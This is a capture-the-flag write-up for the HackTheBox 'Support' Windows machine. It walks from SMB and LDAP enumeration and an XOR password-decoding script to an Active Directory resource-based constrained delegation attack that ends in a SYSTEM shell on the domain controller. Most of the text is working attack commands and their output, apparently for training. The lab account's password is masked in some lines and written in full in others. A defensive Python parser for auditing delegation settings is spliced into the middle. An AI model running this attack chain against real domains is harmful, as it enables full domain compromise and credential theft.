Support

#windows #easy #ldap

https://app.hackthebox.com/machines/Support

Enumeration

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.11.174 -oA openPorts
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49678/tcp open  unknown          syn-ack ttl 127
49702/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127
cat openPorts.nmap | grep -oP '^[0-9]{1,5}' | tr '\n' ',' | sed 's/,$//'
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49678,49702,49740 -sCV -Pn 10.10.11.174 -oA targeted
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-19 14:20:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-19T14:20:59
|_  start_date: N/A
smbclient -N -L //10.10.11.174
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
support-tools   Disk      support staff tools
SYSVOL          Disk      Logon server share 
smbclient -N //10.10.11.174/support-tools
smb: \> ls
  .                                   D        0  Wed Jul 20 14:01:06 2022
  ..                                  D        0  Sat May 28 08:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 08:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 08:19:55 2022
  putty.exe                           A  1273576  Sat May 28 08:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 08:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 14:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 08:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 08:19:43 2022
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (44.4 KiloBytes/sec) (average 44.4 KiloBytes/sec)
mkdir UserInfo
unzip UserInfo.exe.zip -d UserInfo
file UserInfo.exe
UserInfo.exe: PE32 executable for MS Windows 6.00 (console), Intel i386 Mono/.Net assembly, 3 sections

https://github.com/icsharpcode/AvaloniaILSpy/releases

LdapQuery
echo '10.10.11.174 support.htb' | sudo tee -a /etc/hosts
Protected
import base64

# Values recovered from the decompiled UserInfo.exe (the Protected class above)
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

data = bytearray(base64.b64decode(enc_password))

# Undo the obfuscation: each byte was XORed with the repeating key and then with 0xDF
for i in range(len(data)):
    data[i] = (data[i] ^ key[i % len(key)]) ^ 0xDF

password = data.decode('utf-8', errors='replace')

print("Decoded password:", password)
python3 decode.py
Decoded password: nvE***********lmz
ldapsearch -H ldap://support.htb -D "ldap@support.htb" -w 'nvE***********lmz' -b "dc=support,dc=htb" "(sAMAccountName=support)"
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20250619114726.0Z
uSNCreated: 12617
info: Iron********************hful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 86091
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133948093916831645
lastLogoff: 0
lastLogon: 133948094435113580
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133948072466987886
evil-winrm -i 10.10.11.174 -u support -p 'Iron********************hful'
*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/19/2025   4:26 AM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
a677************************e149

Privilege Escalation

nxc ldap 10.10.11.174 -d support.htb --dns-server 10.10.11.174 -u 'support' -p 'Iron********************hful' --bloodhound -c All
LDAP        10.10.11.174    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP        10.10.11.174    389    DC               [+] support.htb\support:Ironside47pleasure40Watchful 
LDAP        10.10.11.174    389    DC               Resolved collection methods: psremote, localadmin, container, trusts, acl, dcom, session, objectprops, group, rdp
LDAP        10.10.11.174    389    DC               Done in 00M 38S
LDAP        10.10.11.174    389    DC               Compressing output into /home/kali/.nxc/logs/DC_10.10.11.174_2025-06-19_140016_bloodhound.zip
sudo sed -i '/support\.htb/ s/$/ dc.support.htb/' /etc/hosts

Resource Based Constrained Delegation

*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
                                        
Info: Uploading /home/kali/htb/machines/support/exploits/PowerView.ps1 to C:\Users\support\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
impacket-addcomputer support.htb/support:Ironside47pleasure40Watchful -computer-name 'SANDIA$' -computer-pass 'Password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account SANDIA$ with password Password123!.
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity SANDIA


DistinguishedName : CN=SANDIA,CN=Computers,DC=support,DC=htb
DNSHostName       :
Enabled           : True
Name              : SANDIA
ObjectClass       : computer
ObjectGUID        : c738df45-c007-44cb-a8b2-b087b866f8cd
SamAccountName    : SANDIA$
SID               : S-1-5-21-1677581083-3380853377-188903654-5603
UserPrincipalName :

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount SANDIA$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=SANDIA,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}
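
The raw value PowerView shows above is a self-relative SECURITY_DESCRIPTOR whose DACL names the principals allowed to act on behalf of DC. The following added example (not part of the writeup or of any tool used in it) parses that binary attribute so an auditor can list and review those principals; SAMPLE_SD is a constructed descriptor granting only the SANDIA$ SID shown above, and the 0x000F01FF mask and ACL revision are assumed values for the sample.

```python
import struct

# Constructed sample of msDS-AllowedToActOnBehalfOfOtherIdentity (a self-relative
# SECURITY_DESCRIPTOR) granting one principal; bytes are hand-encoded for this example.
SAMPLE_SD = bytes.fromhex(
    "01 00 04 80"              # Revision=1, Sbz1=0, Control=0x8004 (DACL_PRESENT|SELF_RELATIVE)
    "00 00 00 00 00 00 00 00"  # OffsetOwner=0, OffsetGroup=0 (none in this sample)
    "00 00 00 00 14 00 00 00"  # OffsetSacl=0, OffsetDacl=20
    "02 00 2c 00 01 00 00 00"  # ACL: AclRevision=2, AclSize=44, AceCount=1
    "00 00 24 00 ff 01 0f 00"  # ACE: ACCESS_ALLOWED, AceSize=36, Mask=0x000F01FF (assumed)
    "01 05 00 00 00 00 00 05"  # SID: Revision=1, 5 sub-authorities, authority 5 (NT)
    "15 00 00 00 1b db fd 63"  # sub-authorities 21, 1677581083
    "81 ba 83 c9 e6 70 42 0b"  # 3380853377, 188903654
    "e3 15 00 00"              # RID 5603 (the SANDIA$ account created in the writeup)
)

SE_DACL_PRESENT = 0x0004
ACCESS_ALLOWED_ACE_TYPE = 0x00

def parse_sid(buf, off):
    """Decode a binary SID at buf[off] into its S-1-... string form."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")   # 48-bit, big-endian
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def principals_allowed_to_delegate(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL.
    An empty or absent attribute (no RBCD configured) yields []."""
    if len(sd) < 20:
        return []
    revision, _sbz1, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _rev, _sbz, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:          # deny/object ACEs are not grants
            sids.append(parse_sid(sd, off + 8))          # SID follows type/flags/size/mask
        off += ace_size
    return sids

def unexpected_delegators(sd, approved):
    """Audit check: SIDs allowed to act on behalf of this computer that are not approved."""
    return [s for s in principals_allowed_to_delegate(sd) if s not in approved]

if __name__ == "__main__":
    print(unexpected_delegators(SAMPLE_SD, approved=set()))
```

On a domain controller this attribute should normally be empty; any SID returned here that is not on an approved list (or that resolves to a recently created machine account) deserves a closer look.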

Synchronize the local clock with the server's time

impacket-getST -spn host/DC.support.htb -impersonate Administrator support.htb/sandia:Password123!
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@host_DC.support.htb@SUPPORT.HTB.ccache

export KRB5CCNAME=Administrator@host_DC.support.htb@SUPPORT.HTB.ccache

impacket-psexec -k -no-pass support.htb/Administrator@DC.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file tzGLJWnY.exe
[*] Opening SVCManager on DC.support.htb.....
[*] Creating service HAxd on DC.support.htb.....
[*] Starting service HAxd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
06/20/2025  03:01 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,912,007,680 bytes free

C:\Users\Administrator\Desktop> type root.txt
df52************************53ab